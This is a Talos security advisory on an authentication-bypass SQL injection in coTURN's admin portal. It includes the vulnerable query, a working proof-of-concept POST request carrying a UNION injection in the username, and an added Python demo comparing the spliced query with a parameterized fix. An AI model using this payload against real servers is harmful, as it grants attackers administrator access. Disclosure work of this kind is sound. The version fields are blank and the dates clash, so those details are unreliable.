Talos Vulnerability Report


coTURN Administrator Web Portal SQL injection vulnerability

January 29, 2018
CVE Number



An exploitable SQL injection vulnerability exists in the administrator web portal function of coTURN prior to version A login message with a specially crafted username can cause an SQL injection, resulting in authentication bypass, which could give access to the TURN server administrator web portal. An attacker can log in via the external interface of the TURN server to trigger this vulnerability.

Tested Versions


Product URLs


CVSSv3 Score

9.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H


CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')


coTURN is an open-source implementation of TURN and STUN servers that can be used as a general-purpose TURN server for network traffic. TURN servers are usually deployed in so-called "DMZ" zones (any network segment reachable from the internet) to provide firewall traversal. Attackers who are able to take over such servers may be able to bypass firewalls and conduct additional attacks from inside the perimeter.

According to Shodan, thousands of coTURN servers are directly reachable on the internet.

The username in POST requests to the login page is passed, without escaping or parameter binding, to the following statement in each of the database driver backends src/apps/relay/dbdrivers/dbd_mysql.c, src/apps/relay/dbdrivers/dbd_pgsql.c and src/apps/relay/dbdrivers/dbd_sqlite.c:

snprintf(statement, sizeof(statement), "select realm,password from admin_user where name='%s'", usname);

Because usname is spliced directly into the query text, a crafted username can terminate the string literal and append a UNION clause, so the query returns an attacker-chosen realm and password instead of the stored credentials. The subsequent password comparison is then made against a value the attacker supplied, which is what allows the authentication bypass.

Even when no administrators are configured and the administrator web portal is deactivated, the portal still accepts POST requests, so it’s still possible to exploit this vulnerability and reactivate the portal.

Exploit proof of concept

POST /logon HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

uname=user' union select '','0000'; --&pwd=0000
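To make the mechanism behind the query construction and the request above concrete from the defender's side, here is an added example that is not part of the Talos report or of the coTURN code base. It reproduces the report's snprintf pattern in Python against an in-memory SQLite database (SQLite being one of the three affected backends) and places it beside a parameterized lookup, then runs the report's payload through both. The table layout, the sample administrator row and the plaintext password comparison are constructed for the demonstration and are assumptions; they do not reflect how coTURN stores credentials.

```python
import sqlite3

# Constructed sample data: one administrator, realm "example.org", password "s3cret".
# Plaintext comparison is an assumption made here to keep the check visible.
SAMPLE_ADMINS = [("admin", "example.org", "s3cret")]

# The exact uname value from the report's proof of concept.
PAYLOAD = "user' union select '','0000'; --"


def make_db():
    """Build an in-memory admin_user table with the constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin_user(name text, realm text, password text)")
    conn.executemany("insert into admin_user values (?, ?, ?)", SAMPLE_ADMINS)
    return conn


def lookup_vulnerable(conn, usname):
    """Mirror of the report's snprintf: the username is spliced into the SQL text."""
    statement = "select realm,password from admin_user where name='%s'" % usname
    return conn.execute(statement).fetchone()  # (realm, password) or None


def lookup_hardened(conn, usname):
    """Parameterized form: the driver binds usname as data, never as SQL."""
    statement = "select realm,password from admin_user where name=?"
    return conn.execute(statement, (usname,)).fetchone()


def logon(conn, usname, pwd, lookup):
    """Return True when the looked-up password matches the submitted one."""
    row = lookup(conn, usname)
    if row is None:
        return False
    _realm, stored_pwd = row
    return stored_pwd == pwd


def demo():
    """Run the legitimate login and the report's payload through both lookups."""
    conn = make_db()
    return {
        "legit_vulnerable": logon(conn, "admin", "s3cret", lookup_vulnerable),
        "bypass_vulnerable": logon(conn, PAYLOAD, "0000", lookup_vulnerable),
        "legit_hardened": logon(conn, "admin", "s3cret", lookup_hardened),
        "bypass_hardened": logon(conn, PAYLOAD, "0000", lookup_hardened),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'authenticated' if ok else 'rejected'}")
```

With the spliced query the UNION branch supplies the row ('', '0000'), so submitting pwd=0000 authenticates without any real administrator record being involved; with the bound parameter the same string is matched literally against the name column, finds nothing, and the login is rejected while a genuine username and password still work. The fix to look for in a patched build is therefore that the username reaches the database as a bound parameter rather than as part of the statement text, in all three driver files named above.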


2017-09-04 - Vendor Disclosure
2019-01-29 - Public Disclosure


Discovered by Nicolas Edet of Cisco.